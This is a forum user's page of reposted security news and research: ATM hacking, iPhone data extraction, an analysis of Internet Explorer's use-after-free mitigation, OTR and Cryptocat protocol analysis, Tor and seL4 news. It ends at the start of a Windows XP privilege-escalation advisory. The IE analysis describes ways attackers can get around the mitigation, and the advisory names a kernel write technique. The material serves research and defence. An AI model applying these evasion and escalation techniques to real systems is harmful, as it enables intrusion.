Everything posted by Nytro
-
Hacker turns ATM into 'Doom' arcade game
by Lisa Vaas on July 29, 2014

Ever watched a Whirlpool washing machine explode after bouncing around the back yard for 3:42 minutes, a chunk of heavy metal ripping it to shreds from the inside out? There's a hacker responsible for this appliance torture, which he's now expanded to include rigging an ATM so you can play Doom on it (this involves less trauma than the washing machine, in that the ATM survives).

Mashable identified the cash machine hacker as an "ingenious Australian lad", Ed Jones, who goes by the handle Aussie50. He says this about what he calls his engineering/scrap metal recycling work: I have a Tenancy to Destroy that which is not useful or repairable, or simply disobeys me. so be sure to watch my motor/appliance destruction videos if you are into stress testing things to the MAX! [sic]

Over the weekend, Aussie50 posted a video showing off an ATM with its guts exposed, its original PIN pad turned into an arcade controller, the side panel used to select weapons. Its screen now eschews balances and transfers in favor of the familiar sight of a hand wrapped around a gun, going around dark corners and blasting stuff.

Were you aware that ATMs - at least the NCR Personas ATM model Aussie50 and his software/wiring/logic partner Julian picked up - have a stereo soundboard in the back? Aussie50 now knows that. Sound system aside, questions abound. For one, can we play with it? That might be on the cards: Aussie50 said in the YouTube comments that he's mulling getting a coin mechanism to install below the card reader.

But more security-focused is the question of where the hardware reconfiguration artist got this ATM. Did he pick it up on eBay? Also, should we worry about malicious hackers getting their hands on ATMs and rigging them so as to swindle funds? The answer, of course, is that they've already figured that stuff out. Recent examples of attackers getting into the juicy guts of publicly accessible ATMs abound.

One memorable incident, from June, involved two Canadian 14-year-olds who came across an old ATM operators manual online, used its instructions to get into the machine's operator mode, broke into a local market's bank ATM on their school lunch break, printed off documentation regarding how much money was inside and how many withdrawals had been made that day, and changed the surcharge amount to one cent.

In the case of that daring duo, I was initially blindsided by the fact that they were precocious tots who reported it to the bank without attempting to profit off their new-found knowledge. They could have wound up in a world of trouble, and/or they could have broken the system they were playing with. For example, as Naked Security's Paul Ducklin pointed out, the kids could have unwittingly triggered a mechanical test sequence that resulted in it spitting out banknotes, which would have left them in the tricky position of having turned into bank robbers.

Given that Aussie50's hobby involves scrap metal recycling, we'll assume that he legally procured his ATM of Doom - therefore, he didn't need prior authorization to access somebody else's ATM's computer system (and innards!). Otherwise, if he were playing with somebody else's hardware, one would hope he'd get the go-ahead from the owner(s) of the system he targeted.
That's how so-called "white-hat" hackers do it, Paul pointed out: True "white hat" penetration testers don't take the first step without making sure that the scope of their work is known and condoned in writing by their customer. (They don't call it the "get out of jail free" letter for nothing.) Sursa: Hacker turns ATM into ‘Doom’ arcade game | Naked Security
-
CVE: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5102
-
Apple Admits Encrypted iPhone Personal Data Can Be Extracted From 'Trusted' Computers
By Dennis Lynch @neato_itsdennis on July 25 2014 10:15 PM

Apple Inc. acknowledged on Friday that encrypted backup data - texts, photos and contacts - can be extracted from an iPhone by anyone with knowledge of extraction techniques, like Apple employees and law enforcement, Reuters reported. Anyone who wants access to that information just needs access to a computer that a user has "trusted" with data from his or her iPhone.

Apple says the mechanism is only for diagnostic purposes, so "enterprise IT departments, developers and Apple [troubleshooters]" can access your phone's technical data, and that it isn't a security issue. "A user must have unlocked their device and agreed to trust another computer before that computer is able to access this limited diagnostic data," Apple said. "As we have said before, Apple has never worked with any government agency from any country to create a backdoor in any of our products or services."

The issue was revealed by self-proclaimed "hacker" and security researcher Jonathan Zdziarski last week at the Hackers on Planet Earth conference in New York City. He says law enforcement or people with malicious intent could access the data in the same way an Apple "Genius" would access it. He calls it a security "back door," but insists he's not accusing Apple of "anything malicious" or of "working with the NSA," but that the flaw is there and could be used by someone seeking personal information.

One Twitter user who appears to "jailbreak" iPhones, or unlock them from Apple software limitations, expressed his disapproval of Zdziarski's reveal, saying he was "giving away all the secrets!"

Sursa: Apple Admits Encrypted iPhone Personal Data Can Be Extracted From 'Trusted' Computers
-
Efficacy of MemoryProtection against use-after-free vulnerabilities
Simon_Z | July 28, 2014

As of the July 2014 patch of Internet Explorer, Microsoft has taken a major step in the evolution of exploit mitigations built into its browser. The new mitigation technology is called MemoryProtection (or MemProtect, for short) and has been shown to be quite effective against a range of use-after-free (UAF) vulnerabilities. Not all UAFs are equally affected, however. Here we'll discuss what MemoryProtection is and how it operates, and evaluate its effectiveness against various types of UAFs.

High-Level Description of MemoryProtection

The heart of MemoryProtection is a new strategy for freeing memory on the heap. When typical C++ code compiled for the Windows platform wishes to free a block of memory on the heap, the operation is implemented by a call to HeapFree. This is a call to the Windows heap manager, and it immediately makes the memory block available for reuse in future allocations. With MemoryProtection, when code wishes to free heap memory, the memory is not immediately freed at the heap manager level. Consequently, the memory is not made available for future allocations - at least not for a very important window in time. Instead of returning the memory to the Windows heap manager, MemoryProtection keeps the memory in an allocated state (as far as the heap manager is concerned), fills the memory with zeroes, and tracks the memory block on a list that MemoryProtection maintains of memory blocks waiting to be freed at the heap manager level. MemoryProtection will ultimately free the block at the heap manager level when it performs a periodic memory reclamation sweep, but only if the stack contains no outstanding references to the block.

Since application-level frees and heap manager-level frees no longer occur at the same time, there is room for confusion whenever a "free" is mentioned. For the purposes of this post, a "free" will mean an application-level free unless specified otherwise. Also, when speaking of a free at the heap manager level we will sometimes speak of the memory being "released" or "returned" to the heap manager.

Detailed Description of MemoryProtection

MemoryProtection maintains a per-thread list of freed memory blocks that are still waiting to be freed at the heap manager level. We will call this the "wait list". When code in Internet Explorer wishes to free a block of memory on the heap, it calls the function MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree. (Note, however, that in many places this function is inlined, which means that its body is copied in its entirety into the compiled code of other functions.) This method performs the following steps:

1. Check if the wait list for the current thread contains at least 100,000 total bytes of memory waiting to be freed at the heap manager level. If so, perform a reclamation sweep (see below).
2. Add an entry to the current thread's wait list, recording the block's address, its size, and whether the block resides on the regular process heap or on the isolated heap.
3. Fill the memory block with zeroes.

To perform a reclamation sweep, the steps are as follows. These steps are implemented by MemoryProtection::CMemoryProtector::MarkBlocks and MemoryProtection::CMemoryProtector::ReclaimUnmarkedBlocks. All operations apply to the current thread's wait list only.

1. Sort the wait list in increasing order of block address.
2. Place a mark on every wait list entry whose block is still pointed to by a pointer residing on the current thread's stack. The pointer could be either a pointer to the start of the block or a pointer to any memory location falling within the block's address range.
3. Iterate over the wait list. For each wait list entry encountered that is not marked, release the memory block at the heap manager level via an actual call to HeapFree, and remove the block from the wait list. Remove all marks from marked entries.

In addition, an unconditional reclamation step is performed periodically. This occurs each time Internet Explorer's WndProc is entered to service a message for the thread's main window. At that time, the entire wait list is emptied and all waiting blocks are returned to the heap manager. The function performing this action is MemoryProtection::CMemoryProtector::ReclaimMemoryWithoutProtection.

For efficiency, the wait list is rearranged in certain ways while performing the iteration in step 3 above. Therefore blocks are not necessarily freed in order of increasing address, nor are they always freed in the same order in which they are placed on the wait list.

For research and debugging purposes it is often useful to be able to observe the behavior of Internet Explorer without MemoryProtection. In particular, MemoryProtection will interfere with the ability to use the heap manager's call stack database to capture the call stack at the time of an application-level free. (By the same token, MemoryProtection actually makes it easier to capture the call stack at the time of allocation.) MemoryProtection can effectively be turned off via a manual procedure by writing the value 0xffffffff to the variable MSHTML!MemoryProtection::CMemoryProtector::tlsSlotForInstance. In WinDbg, this can be done via the following command:

ed MSHTML!MemoryProtection::CMemoryProtector::tlsSlotForInstance 0xffffffff

Effect of MemoryProtection on UAFs

When an IE exploit leveraging a UAF is run unmodified against the newly MemoryProtection-enabled IE, the result will often resemble a null-pointer dereference. At the point in time when the exploit attempts to perform an allocation reusing memory from the freed block, the original memory block has not yet been returned to the heap manager; as a result, the exploit code fails to cause a new allocation at that location. Ultimately, when IE makes its improper use of the freed memory, any data read consists of zeroes. Often this will cause a quick and harmless termination of the IE process when the zero value is interpreted as a pointer and is dereferenced. It's important to realize that even when the symptom appears to indicate that the bug is a null-pointer dereference, the underlying cause actually may be a UAF and a potential security risk.

Let's consider how an attacker might be able to modify the exploit in order to evade MemoryProtection. For a successful attack, the exploit must be able to trigger a memory sweep in between the free and the reallocation. Furthermore, at the time of this sweep, the stack must not contain any outstanding references to the freed block. It follows that there are some UAFs that are impossible to exploit under MemoryProtection. Specifically: if an outstanding stack reference exists for the entire period of time between the free and the later use, then it is impossible to cause reclamation of the freed block. This is a common situation that accounts for a large percentage of UAFs.
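To make the wait-list bookkeeping above easier to picture, here is a toy Python model of it (my own illustration, not code from MSHTML; the real implementation scans the actual thread stack, which is modelled here as an explicit set of addresses passed in by the caller):

# Toy model of MemoryProtection's per-thread wait list (illustrative only).
WAIT_LIST_THRESHOLD = 100000   # bytes pending before a sweep is attempted

def heap_free(address):
    # Stands in for the real HeapFree() call to the Windows heap manager.
    print("HeapFree(0x%08x)" % address)

class WaitList(object):
    def __init__(self):
        self.entries = []          # (address, size) of application-level frees
        self.pending_bytes = 0

    def protected_free(self, address, size, stack_refs):
        # Step 1: if >= 100,000 bytes are waiting, attempt a reclamation sweep.
        if self.pending_bytes >= WAIT_LIST_THRESHOLD:
            self.reclaim_unmarked(stack_refs)
        # Step 2: record the block. (Step 3, zero-filling the block, is omitted here.)
        self.entries.append((address, size))
        self.pending_bytes += size

    def reclaim_unmarked(self, stack_refs):
        # Release only blocks with no outstanding reference from the "stack".
        kept = []
        for address, size in sorted(self.entries):         # sweep in address order
            if any(address <= ref < address + size for ref in stack_refs):
                kept.append((address, size))                # still referenced: keep waiting
            else:
                heap_free(address)                          # returned to the heap manager
                self.pending_bytes -= size
        self.entries = kept

A block whose address range is still covered by a stack reference simply survives every sweep; that is why UAFs with an outstanding stack reference, including the very common pattern described next, cannot be forced back into the allocator.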
Many UAFs are the result of a situation in which a free occurring at a deeper level in the call stack leaves a dangling pointer (sometimes a "this" pointer) at a higher level in the call stack. The crash occurs when the stack is popped to the level at which the dangling pointer resides. This very common type of UAF is now non-exploitable.

As for UAFs not falling into the above category, however, the situation is quite different. Consider the case of a UAF in which a certain script action results in a dangling pointer being stored in heap memory, more or less permanently - by which we mean that the dangling pointer remains in place even after the return of all currently executing functions. The malicious script can then trigger the use of the dangling pointer at a much later point in time. We call these "long-lived" UAFs. In the case of a long-lived UAF, MemoryProtection offers no real defense. An attacker can ensure that the memory block is freed at the heap manager level by allowing Internet Explorer's message loop to execute, as this will trigger an unconditional release of all waiting blocks. Though it may seem that the additional blocks released during this sweep have the potential to disrupt the exploit by causing various heap coalesces that are hard to predict, this problem can largely be eliminated by properly preparing the wait list so it will contain a minimum of entries at the time of the sweep.

For UAFs not falling into the above categories, MemoryProtection may provide partial or full mitigation. Consider the common case of a UAF in which the free and the use occur within the same script method. In the past, some of these have been exploitable conditions. MemoryProtection adds some additional hurdles that an attacker must clear. By referring to the ProtectedFree algorithm above, you can see that when IE calls ProtectedFree on a block of memory, the memory is never returned to the Windows heap manager at that time - not even if the wait list is very full. The return of the memory to the heap manager will always be delayed at least until the next call to ProtectedFree, at which point a sweep could occur. Therefore, an additional hurdle for an attacker in this situation is to find a way to force an additional free in between the free and the reallocation. This additional free must be performed on the same thread as the original free, since wait lists are maintained on a per-thread basis. For certain bugs this additional requirement will make exploitation impossible or too unreliable for use by an adversary. In other cases, when it is easy to force an additional free, MemoryProtection provides a weak form of protection by making it a bit more complex to arrange for a desired sequence of frees at the heap manager level. Typically it is possible to evade this protection through the addition of further script actions that prepare the wait list, forcing it into a known desired state containing only a small number of entries.

In Summary

MemoryProtection is a significant new mitigation that makes Internet Explorer more secure by eliminating entire classes of UAFs and rendering them non-exploitable. For other classes of UAFs MemoryProtection is ineffective or only partially effective. Researchers should be aware that some IE crashes that appear to be null-pointer dereferences actually mask an underlying exploitable bug.

Simon Zuckerbraun
Security Researcher, HP ZDI

Sursa: Efficacy of MemoryProtection against use-after-fre... - HP Enterprise Business Community
-
Breaking Antivirus Software
Joxean Koret, COSEINC
SYSCAN 360, 2014

- Introduction
- Attacking antivirus engines
- Finding vulnerabilities
- Exploiting antivirus engines
- Antivirus vulnerabilities
- Conclusions
- Recommendations

Download: http://www.syscan360.org/slides/2014_EN_BreakingAVSoftware_JoxeanKoret.pdf
-
Noodling about IM protocols

The last couple of months have been a bit slow in the blogging department. It's hard to blog when there are exciting things going on. But also: I've been a bit blocked. I have two or three posts half-written, none of which I can quite get out the door. Instead of writing and re-writing the same posts again, I figured I might break the impasse by changing the subject. Usually the easiest way to do this is to pick some random protocol and poke at it for a while to see what we learn.

The protocols I'm going to look at today aren't particularly 'random' -- they're both popular encrypted instant messaging protocols. The first is OTR (Off the Record Messaging). The second is Cryptocat's group chat protocol. Each of these protocols has a similar end-goal, but they get there in slightly different ways. I want to be clear from the start that this post has absolutely no destination. If you're looking for exciting vulnerabilities in protocols, go check out someone else's blog. This is pure noodling.

The OTR protocol

OTR is probably the most widely-used protocol for encrypting instant messages. If you use IM clients like Adium, Pidgin or ChatSecure, you already have OTR support. You can enable it in some other clients through plugins and overlays. OTR was originally developed by Borisov, Goldberg and Brewer and has rapidly come to dominate its niche. Mostly this is because Borisov et al. are smart researchers who know what they're doing. Also: they picked a cool name and released working code.

OTR works within the technical and usage constraints of your typical IM system. Roughly speaking, these are:

- Messages must be ASCII-formatted and have some (short) maximum length.
- Users won't bother to exchange keys, so authentication should be "lazy" (i.e., you can authenticate your partners after the fact).
- Your chat partners are all FBI informants so your chat transcripts must be plausibly deniable -- so as to keep them from being used as evidence against you in a court of law.

Coming to this problem fresh, you might find goal (3) a bit odd. In fact, to the best of my knowledge no court in the history of law has ever used a cryptographic transcript as evidence that a conversation occurred. However it must be noted that this requirement makes the problem a bit more sexy. So let's go with it!

[Image caption: "Dammit, they used a deniable key exchange protocol" said no Federal prosecutor ever.]

The OTR (version 2/3) handshake is based on the SIGMA key exchange protocol. Briefly, it assumes that both parties generate long-term DSA public keys which we'll denote by (pubA, pubB). Next the parties interact as follows:

[Image caption: The OTRv2/v3 AKE. Diagram by Bonneau and Morrison, all colorful stuff added. There's also an OTRv1 protocol that's too horrible to talk about here.]

There are four elements to this protocol:

Hash commitment. First, Bob commits to his share of a Diffie-Hellman key exchange (g^x) by encrypting it under a random AES key r and sending the ciphertext and a hash of g^x over to Alice.

Diffie-Hellman Key Exchange. Next, Alice sends her half of the key exchange protocol (g^y). Bob can now 'open' his share to Alice by sending the AES key r that he used to encrypt it in the previous step.
Alice can decrypt this value and check that it matches the hash Bob sent in the first message. Now that both sides have the shares (g^x, g^y) they each use their secrets to compute a shared secret g^{xy} and hash the value several ways to establish shared encryption keys (c', Km2, Km'2) for subsequent messages. In addition, each party hashes g^{xy} to obtain a short "session ID". The sole purpose of the commitment phase (step 1) is to prevent either Alice or Bob from controlling the value of the shared secret g^{xy}. Since the session ID value is derived by hashing the Diffie-Hellman shared secret, it's possible to use a relatively short session ID value to authenticate the channel, since neither Alice nor Bob will be able to force this ID to a specific value.

Exchange of long-term keys and signatures. So far Alice and Bob have not actually authenticated that they're talking to each other, hence their Diffie-Hellman exchange could have been intercepted by a man-in-the-middle attacker. Using the encrypted channel they've previously established, they now set about to fix this. Alice and Bob each send their long-term DSA public key (pubA, pubB) and key identifiers, as well as a signature on (a MAC of) the specific elements of the Diffie-Hellman message (g^x, g^y) and their view of which party they're communicating with. They can each verify these signatures and abort the connection if something's amiss.**

Revealing MAC keys. After sending a MAC, each party waits for an authenticated response from its partner. It then reveals the MAC keys for the previous messages.

Lazy authentication. Of course if Alice and Bob never exchange public keys, this whole protocol execution is still vulnerable to a man-in-the-middle (MITM) attack. To verify that nothing's amiss, both Alice and Bob should eventually authenticate each other. OTR provides three mechanisms for doing this: parties may exchange fingerprints (essentially hashes) of (pubA, pubB) via a second channel. Alternatively, they can exchange the "session ID" calculated in the second phase of the protocol. A final approach is to use the Socialist Millionaires' Problem to prove that both parties share the same secret.

The OTR key exchange provides the following properties:

Protecting user identities. No user-identifying information (e.g., long-term public keys) is sent until the parties have first established a secure channel using Diffie-Hellman. The upshot is that a purely passive attacker doesn't learn the identity of the communicating partners -- beyond what's revealed by the higher-level IM transport protocol.* Unfortunately this protection fails against an active attacker, who can easily smash an existing OTR connection to force a new key agreement and run an MITM on the Diffie-Hellman used during the next key agreement. This does not allow the attacker to intercept actual message content -- she'll get caught when the signatures don't check out -- but she can view the public keys being exchanged. From the client point of view the likely symptoms are a mysterious OTR error, followed immediately by a successful handshake. One consequence of this is that an attacker could conceivably determine which of several clients you're using to initiate a connection.

Weak deniability. The main goal of the OTR designers is plausible deniability. Roughly, this means that when you and I communicate there should be no binding evidence that we really had the conversation.
This rules out obvious solutions like GPG-based chats, where individual messages would be digitally signed, making them non-repudiable. Properly defining deniability is a bit complex. The standard approach is to show the existence of an efficient 'simulator' -- in plain English, an algorithm for making fake transcripts. The theory is simple: if it's trivial to make fake transcripts, then a transcript can hardly be viewed as evidence that a conversation really occurred.

OTR's handshake doesn't quite achieve 'strong' deniability -- meaning that anyone can fake a transcript between any two parties -- mainly because it uses signatures. As signatures are non-repudiable, there's no way to fake one without actually knowing your public key. This reveals that we did, in fact, communicate at some point. Moreover, it's possible to create an evidence trail that I communicated with you, e.g., by encoding my identity into my Diffie-Hellman share (g^x). At the very least I can show that at some point you were online and we did have contact.

But proving contact is not the same thing as proving that a specific conversation occurred. And this is what OTR works to prevent. The guarantee OTR provides is that if the target was online at some point and you could contact them, there's an algorithm that can fake just about any conversation with the individual. Since OTR clients are, by design, willing to initiate a key exchange with just about anyone, merely putting your client online makes it easy for people to fake such transcripts.***

Towards strong deniability. The 'weak' deniability of OTR requires at least tacit participation of the user (Bob) for which we're faking the transcript. This isn't a bad property, but in practice it means that fake transcripts can only be produced by either Bob himself, or someone interacting online with Bob. This certainly cuts down on your degree of deniability. A related concept is 'strong deniability', which ensures that any party can fake a transcript using only public information (e.g., your public keys). OTR doesn't try to achieve strong deniability -- but it does try for something in between. The OTR version of deniability holds that an attacker who obtains the network traffic of a real conversation -- even if they aren't one of the participants -- should be able to alter the conversation to say anything he wants. Sort of.

The rough outline of the OTR deniability process is to generate a new message authentication key for each message (using Diffie-Hellman) and then reveal those keys once they've been used up. In theory, a third party can obtain this transcript and -- if they know the original message content -- they can 'maul' the AES-CTR encrypted messages into messages of their choice, then they can forge their own MACs on the new messages.

[Image caption: OTR message transport (source: Bonneau and Morrison, all colored stuff added).]

Thus our hypothetical transcript forger can take an old transcript that says "would you like a Pizza" and turn it into a valid transcript that says, for example, "would you like to hack STRATFOR"... Except that they probably can't, since the first message is too short and... oh lord, this whole thing is a stupid idea -- let's stop talking about it.

The OTRv1 handshake. Oh yes, there's also an OTRv1 protocol that has a few issues and isn't really deniable.
Even better, an MITM attacker can force two clients to downgrade to it, provided both support that version. Yuck.

So that's the OTR protocol. While I've pointed out a few minor issues above, the truth is that the protocol is generally an excellent way to communicate. In fact it's such a good idea that if you really care about secrecy it's probably one of the best options out there.

Cryptocat

Since we're looking at IM protocols I thought it might be nice to contrast with another fairly popular chat protocol: Cryptocat's group chat. Cryptocat is a web-based encrypted chat app that now runs on iOS (and also in Thomas Ptacek's darkest nightmares). Cryptocat implements OTR for 'private' two-party conversations. However OTR is not the default. If you use Cryptocat in its default configuration, you'll be using its hand-rolled protocol for group chats.

The Cryptocat group chat specification can be found here, and it's remarkably simple. There are no "long-term" keys in Cryptocat. Diffie-Hellman keys are generated at the beginning of each session and re-used for all conversations until the app quits. Here's the handshake between two parties:

[Image caption: Cryptocat group chat handshake (current revision). Setting is Curve25519. Keys are generated when the application launches, and re-used through the session.]

If multiple people join the room, every pair of users repeats this handshake to derive a shared secret between every pair of users. Individuals are expected to verify each others' keys by checking fingerprints and/or running the Socialist Millionaire protocol. Unlike OTR, the Cryptocat handshake includes no key confirmation messages, nor does it attempt to bind users to their identity or chat room. One implication of this is that I can transmit someone else's public key as if it were my own -- and the recipients of this transmission will believe that the person is actually part of the chat. Moreover, since public keys aren't bound to the user's identity or the chat room, you could potentially route messages between a different user (even a user in a different chat room) while making it look like they're talking to you. Since Cryptocat is a group chat protocol, there might be some interesting things you could do to manipulate the conversation in this setting.**** Does any of this matter? Probably not that much, but it would be relatively easy (and good) to fix these issues.

Message transmission and consistency. The next interesting aspect of Cryptocat is the way it transmits encrypted chat messages. One of the core goals of Cryptocat is to ensure that messages are consistent between individual users. This means that all users should be able to verify that the other user is receiving the same data as it is. Cryptocat uses a slightly complex mechanism to achieve this. For each pair of users in the chat, Cryptocat derives an AES key and a MAC key from the Diffie-Hellman shared secret. To send a message, the client:

- Pads the message by appending 64 bytes of random padding.
- Generates a random 12-byte Initialization Vector for each of the N users in the chat.
- Encrypts the message using AES-CTR under the shared encryption key for each user.
- Concatenates all of the N resulting ciphertexts/IVs and computes an HMAC of the whole blob under each recipient's key.
- Calculates a 'tag' for the message by hashing the following data: padded plaintext || HMAC-SHA512alice || HMAC-SHA512bob || HMAC-SHA512carol || ...
- Broadcasts the N ciphertexts, IVs, MACs and the single 'tag' value to all users in the conversation.

When a recipient receives a message from another user, it verifies that:

- The message contains a valid HMAC under its shared key.
- This IV has not been received before from this sender.
- The decrypted plaintext is consistent with the 'tag'.

Roughly speaking, the idea here is to make sure that every user receives the same message. The use of a hashed plaintext is a bit ugly, but the argument here is that the random padding protects the message from guessing attacks. Make what you will of this.

Anti-replay. Cryptocat also seeks to prevent replay attacks, e.g., where an attacker manipulates a conversation by simply replaying (or reflecting) messages between users, so that users appear to be repeating statements. For example, consider the following chat transcripts:

[Image caption: Replays and reflection attacks.]

Replay attacks are prevented through the use of a global 'IV array' that stores all previously received and sent IVs to/from all users. If a duplicate IV arrives, Cryptocat will reject the message. This is unwieldy but it generally seems ok to prevent replays and reflection. A limitation of this approach is that the IV array does not live forever. In fact, from time to time Cryptocat will reset the IV array without regenerating the client key. This means that if Alice and Bob both stay online, they can repeat the key exchange and wind up using the same key again -- which makes them both vulnerable to subsequent replays and reflections. (Update: This issue has since been fixed).

In general the solution to these issues is threefold:

- Keys shouldn't be long-term, but should be regenerated using new random components for each key exchange.
- Different keys should be derived for the Alice->Bob and Bob->Alice direction.
- It would be more elegant to use a message counter than to use this big, unwieldy key array.

The good news is that the Cryptocat developers are working on a totally new version of the multi-party chat protocol that should be enormously better.

In conclusion

I said this would be a post that goes nowhere, and I delivered! But I have to admit, it helps to push it out of my system. None of the issues I note above are the biggest deal in the world. They're all subtle issues, which illustrates two things: first, that crypto is hard to get right. But also: that crypto rarely fails catastrophically. The exciting crypto bugs that cause you real pain are still few and far between.

Notes:

* In practice, you might argue that the higher-level IM protocol already leaks user identities (e.g., Jabber nicknames). However this is very much an implementation choice. Moreover, even when using Jabber with known nicknames, you might access the Jabber server using one of several different clients (your computer, phone, etc.). Assuming you use Tor, the only indication of this might be the public key you use during OTR. So there's certainly useful information in this protocol.

** Notice that OTR signs a MAC instead of a hash of the user identity information. This happens to be a safe choice given that the MAC used is based on HMAC-SHA2, but it's not generally a safe choice.
Swapping the HMAC out for a different MAC function (e.g., CBC-MAC) would be catastrophic. *** To get specific, imagine I wanted to produce a simulated transcript for some conversation with Bob. Provided that Bob's client is online, I can send Bob any g^x value I want. It doesn't matter if he really wants to talk to me -- by default, his client will cheerfully send me back his own g^y and a signature on (g^x, g^y, pub_B, keyid_ which, notably, does not include my identity. From this point on all future authentication is performed using MACs and encrypted under keys that are known to both of us. There's nothing stopping me from faking the rest of the conversation. **** Incidentally, a similar problem exists in the OTRv1 protocol. Posted by Matthew Green at 9:31 AM Sursa: A Few Thoughts on Cryptographic Engineering: Noodling about IM protocols
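As an aside, the Cryptocat message construction described above is easier to follow in code. The following is a rough Python sketch of the per-message procedure (my own illustration using the cryptography package for AES-CTR; it is not Cryptocat's actual JavaScript implementation, and the 12-byte IV is simply extended to a 16-byte initial counter block here):

import os, hmac, hashlib
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def encrypt_group_message(plaintext, recipients):
    # recipients: dict of name -> (aes_key, mac_key), one key pair per chat partner,
    # as derived from the pairwise Diffie-Hellman shared secrets (aes_key: 16/24/32 bytes).
    padded = plaintext + os.urandom(64)               # 1. append 64 bytes of random padding
    ciphertexts, ivs, macs = {}, {}, {}
    for name, (aes_key, mac_key) in recipients.items():
        iv = os.urandom(12)                           # 2. fresh 12-byte IV per recipient
        ctr = iv + b"\x00" * 4                        # extend to a 16-byte initial counter block
        enc = Cipher(algorithms.AES(aes_key), modes.CTR(ctr)).encryptor()
        ciphertexts[name] = enc.update(padded) + enc.finalize()   # 3. AES-CTR per recipient
        ivs[name] = iv
    blob = b"".join(ciphertexts[n] + ivs[n] for n in sorted(recipients))
    for name, (aes_key, mac_key) in recipients.items():
        macs[name] = hmac.new(mac_key, blob, hashlib.sha512).digest()   # 4. HMAC of the whole blob
    # 5. a single 'tag' binding the padded plaintext to every recipient's HMAC
    tag = hashlib.sha512(padded + b"".join(macs[n] for n in sorted(recipients))).digest()
    # 6. everything returned here gets broadcast to the whole room
    return ciphertexts, ivs, macs, tag

Each recipient then checks its own HMAC, rejects any IV it has already seen from that sender, and verifies that the decrypted (padded) plaintext is consistent with the tag, matching the verification steps listed above.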
-
Black Hat presentation on unmasking TOR users suddenly cancelled
Jeremy Kirk, IDG News Service

A presentation on a low-budget method to unmask users of a popular online privacy tool, TOR, will no longer go ahead at the Black Hat security conference early next month. The talk was nixed by the legal counsel with Carnegie Mellon's Software Engineering Institute after a finding that materials from researcher Alexander Volynkin were not approved for public release, according to a notice on the conference's website. It's rare but not unprecedented for Black Hat presentations to be cancelled. It was not clear why lawyers felt Volynkin's presentation should not proceed.

Volynkin, a research scientist with the university's Computer Emergency Response Team (CERT), was due to give a talk entitled "You Don't Have to be the NSA to Break Tor: Deanonymizing Users on a Budget" at the conference, which takes place Aug. 6-7 in Las Vegas.

TOR is short for The Onion Router, which is a network of distributed nodes that provide greater privacy by encrypting a person's browsing traffic and routing that traffic through random proxy servers. Although originally developed by the U.S. Naval Research Laboratory, it is now maintained by The TOR Project. TOR is widely used by both cybercriminals and those with legitimate interests in preserving their anonymity, such as dissidents and journalists. Although TOR masks a computer's true IP address, advanced attacks have been developed that undermine its effectiveness.

Some of Volynkin's materials were informally shared with The TOR Project, a nonprofit group that oversees TOR, wrote Roger Dingledine, a co-founder of the organization, in a mailing list post on Monday. The TOR Project did not request the talk to be canceled, Dingledine wrote. Also, the group has not received slides or descriptions of Volynkin's talk that go beyond an abstract that has now been deleted from Black Hat's website. Dingledine wrote that The TOR Project is working with CERT to do a coordinated disclosure around Volynkin's findings, possibly later this week. In general, the group encourages researchers to responsibly disclose information about new attacks. "Researchers who have told us about bugs in the past have found us pretty helpful in fixing issues and generally positive to work with," Dingledine wrote.

Sursa: Black Hat presentation on unmasking TOR users suddenly cancelled | PCWorld
-
DARPA-derived secure microkernel goes open source tomorrow
Hacker-repelling, drone-protecting code will soon be yours to tweak as you see fit
By Darren Pauli, 28 Jul 2014

A nippy microkernel mathematically proven to be bug free*, and used to protect drones from hacking, will be released as open source tomorrow. The formal-methods-based secure embedded L4 (seL4) microkernel was developed by Australian boffins at National ICT Australia (NICTA) and was part of the US Defense Advanced Research Projects Agency's High-Assurance Cyber Military Systems program hatched in 2012 to stop hackers knocking unmanned birds out of the sky. It was noted as the most advanced and highly-assured member of the L4 microkernel family due to its use of formal methods that did not impact performance.

A microkernel differs from monolithic kernels – such as the Linux and Windows kernels – by running as much code as possible – from drivers to system services – in user space, making the whole thing more modular and (in theory) more stable.

Tomorrow at noon Eastern Australian Standard Time (GMT +10) seL4's entire source code including proofs and additional code used to build trustworthy systems will be released under the GPL v2 licence. A global group of maths and aviation gurus from the likes of Boeing and Rockwell Collins joined a team of dedicated NICTA researchers on the project, which involved the seL4 operating system designed to detect and foil hacking attempts.

NICTA senior researcher Doctor June Andronick said the kernel should be considered by anyone building critical systems such as pacemakers and technology-rich cars. "If your software runs the seL4 kernel, you have a guarantee that if a fault happens in one part of the system it cannot propagate to the rest of the system and in particular the critical parts," Andronick said earlier this month. "We provide a formal mathematical proof that this seL4 kernel is correct and guarantees the isolation between components."

NICTA demonstrated in a video how a drone running the platform could detect hacking attempts from ground stations that would normally cause the flight software to die and the aircraft to crash. "What we are demonstrating here is that if one of the ground stations is malicious, and sends a command to the drone to stop the flight software, the commercially-available drone will accept the command, kill the software and just drop from the sky," Andronick said. The researchers' demo drone would instead detect the intrusion attempt, flash its LED lights and fly away. This could ensure that real drone missions could continue in the event of hacking attempts by combatants. Andronick said seL4 would come into play as the team added more functionality including navigation, autonomous flight and mission control components.

In depth information about seL4 was available on the NICTA website and within the paper Comprehensive Formal Verification of an OS Microkernel. ®

* That's bug free according to the formal verification of its specification; design flaws in the specs aren't counted by the team.

Sursa: DARPA-derived secure microkernel goes open source tomorrow • The Register
-
ASUS Launches the Fastest Wi-Fi Router Ever, at 2.33 Gbps
Nytro replied to SirGod's topic in Stiri securitate
I'll settle for this one: Asus RT-AC68U Dual-band Wireless-AC1900 Gigabit Router, USB 3.0, IEEE 802.11a/b/g/n - eMAG.ro
There's also the "cheerful boy": Router Wireless Linksys Smart Wi-Fi WRT1900AC, Dual Band, USB, AC1900 - eMAG.ro
But I prefer the ASUS. The price difference is too big. I'm curious how much it will cost. And how easily you can fry eggs next to it.
-
Those are probably fixed. The exploit does NOT check if the forum is vulnerable. If it shows this error on Home - vBulletin Community Forum it means it was fixed.
-
Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
Authored by Matthew Bergin

A vulnerability within the MQAC module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. Microsoft MQ Access Control version 5.1.0.1110 on XP SP3 is affected.

Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2014-003
Publication Date: 2014.07.18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt

1. Vulnerability Details

